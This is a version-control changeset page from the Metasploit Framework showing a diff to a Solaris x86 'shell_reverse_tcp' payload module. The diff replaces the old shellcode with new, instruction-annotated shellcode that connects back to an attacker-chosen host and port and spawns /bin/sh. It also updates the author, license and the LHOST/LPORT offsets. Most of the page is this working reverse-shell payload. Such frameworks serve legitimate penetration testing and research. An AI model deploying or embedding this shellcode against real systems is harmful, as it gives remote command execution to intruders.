Navigation

← Previous Changeset
Next Changeset →

Changeset 4844

Timestamp:

05/02/07 22:13:00 (1 year ago)

Author:

hdm

Message:

More payloads from Ramon (fixes #98, #99, #100, #101)

Files:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb (modified) (3 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb

r4571	r4844
1		##
2	1	# $Id$
3		##
4
5		##
6		~~# This file is part of the Metasploit Framework and may be subject to~~
7		~~# redistribution and commercial restrictions. Please see the Metasploit~~
8		~~# Framework web site for more information on licensing and terms of use.~~
9		~~# http://metasploit.com/projects/Framework/~~
10		##
11
12	2
13	3	require 'msf/core'
…	…
30	20	'Version' => '$Revision$',
31	21	'Description' => 'Connect back to attacker and spawn a command shell',
32		'Author' => '~~bighawk <bighawk@warfare.com~~>',
33		'License' => ~~BSD~~_LICENSE,
	22	'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
	23	'License' => MSF_LICENSE,
34	24	'Platform' => 'solaris',
35	25	'Arch' => ARCH_X86,
…	…
40	30	'Offsets' =>
41	31	{
42		'LHOST' => [ 32, 'ADDR' ],
43		'LPORT' => [ 38, 'n' ],
	32	'LHOST' => [ 15, 'ADDR' ],
	33	'LPORT' => [ 21, 'n' ],
44	34	},
45	35	'Payload' =>
46		"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31" +
47		"\xc9\x51\x41\x41\x51\x51\xb0\xe6\xff\xd5\x31\xd2\x89\xc7\x68\x93" +
48		"\x93\x93\x93\x66\x68\x93\x93\x66\x51\x89\xe6\x6a\x10\x56\x57\xb0" +
49		"\xeb\xff\xd5\x31\xd2\xb2\x09\x51\x52\x57\xb0\x3e\xff\xd5\x49\x79" +
50		"\xf2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53" +
51		"\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5"
	36	"\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
	37	"\x6a\x65" +# pushl $0x65 #
	38	"\x89\xe6" +# movl %esp,%esi #
	39	"\xf7\x56\x04" +# notl 0x04(%esi) #
	40	"\xf6\x16" +# notb (%esi) #
	41	"\x68\x7f\x01\x01\x01" +# pushl $0x0101017f #
	42	"\x66\x68\x04\xd2" +# pushw $0xd204 #
	43	"\x66\x6a\x02" +# pushw $0x02 #
	44	"\x89\xe7" +# movl %esp,%edi #
	45	"\x6a\x02" +# pushl $0x02 #
	46	"\x31\xc0" +# xorl %eax,%eax #
	47	"\x50" +# pushl %eax #
	48	"\x50" +# pushl %eax #
	49	"\x6a\x02" +# pushl $0x02 #
	50	"\x6a\x02" +# pushl $0x02 #
	51	"\xb0\xe6" +# movb $0xe6,%al #
	52	"\xff\xd6" +# call *%esi #
	53	"\x6a\x10" +# pushl $0x10 #
	54	"\x57" +# pushl %edi #
	55	"\x50" +# pushl %eax #
	56	"\x31\xc0" +# xorl %eax,%eax #
	57	"\xb0\xeb" +# movb $0xeb,%al #
	58	"\xff\xd6" +# call *%esi #
	59	"\x5b" +# popl %ebx #
	60	"\x53" +# pushl %ebx #
	61	"\x6a\x09" +# pushl $0x09 #
	62	"\x53" +# pushl %ebx #
	63	"\x6a\x3e" +# pushl $0x3e #
	64	"\x58" +# popl %eax #
	65	"\xff\xd6" +# call *%esi #
	66	"\xff\x4f\xe0" +# decl -0x20(%edi) #
	67	"\x79\xf6" +# jns <cntsockcode+57> #
	68	"\x50" +# pushl %eax #
	69	"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
	70	"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
	71	"\x89\xe3" +# movl %esp,%ebx #
	72	"\x50" +# pushl %eax #
	73	"\x53" +# pushl %ebx #
	74	"\x89\xe1" +# movl %esp,%ecx #
	75	"\x50" +# pushl %eax #
	76	"\x51" +# pushl %ecx #
	77	"\x53" +# pushl %ebx #
	78	"\xb0\x3b" +# movb $0x3b,%al #
	79	"\xff\xd6" # call *%esi #
52	80	}
53	81	))

Navigation

Changeset 4844

Legend:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb

Download in other formats: